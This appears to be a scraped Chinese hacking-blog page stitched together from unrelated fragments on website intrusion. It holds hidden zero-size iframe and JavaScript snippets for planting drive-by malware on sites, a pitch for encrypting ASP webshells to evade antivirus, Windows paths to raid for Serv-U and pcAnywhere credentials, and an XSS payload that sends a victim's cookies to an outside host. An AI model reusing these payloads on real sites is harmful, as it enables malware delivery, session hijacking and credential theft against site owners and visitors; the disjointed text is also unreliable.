MK2-风 之谷

跨站脚本=XSS攻击测试语句大全

url: %3C=<   %3E=>   %22="   %2e=.   (=%28   '=%27    )=%29   /=%2F   ;=%3B
...

一:框架挂马
<iframe src=地址 width=0 height=0></iframe>

二:js文件挂马
首先将以下代码
document.write("<iframe width='0' height='0' src='地址'></iframe>");
保存为xxx.js，
则JS挂马代码为
<script language=javascript src=xxx.js></script>
...

大家在入侵中应该是捡到过别人的Webshell吧?也许有的大马功能很好，于是你就用了，但是你没想过该马可能有后门?现在很多的大马都加密了，打开时候一片乱码，是不是也想加密自己的大马了，加密后的Webshell不仅可以防止别人捡我们的Shell用，还能免杀webshell。ASP木马加密不难，让我们一起踏上大马加密之旅。
...

  常常在一个站看电影~~

     就想看一下安全怎么样~~

第一课 网站入侵概述
http://www.hx95.com/20081115/jbrq01.rar  
第二课 常见网站入侵软件介绍和使用  
...

C:\Documents and Settings\All Users\「开始」菜单\程序\     －－‘看这里能不能跳转，我们从这里可以获取好多有用的信息比如Serv-U的路径。
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ －－‘看能否跳转到这个目录，如果行那就最好了，直接下它的CIF文件，破解得到pcAnywhere密码，然后登陆
...

作者：Flyh4t

校内网在发blog时对插入图片过滤不严格，存在xss漏洞

在发blog时将插入图片URL写为如下代码即可触发：

javascript:window.location.href='http://xxxxx/test.php?cookie='+document.cookie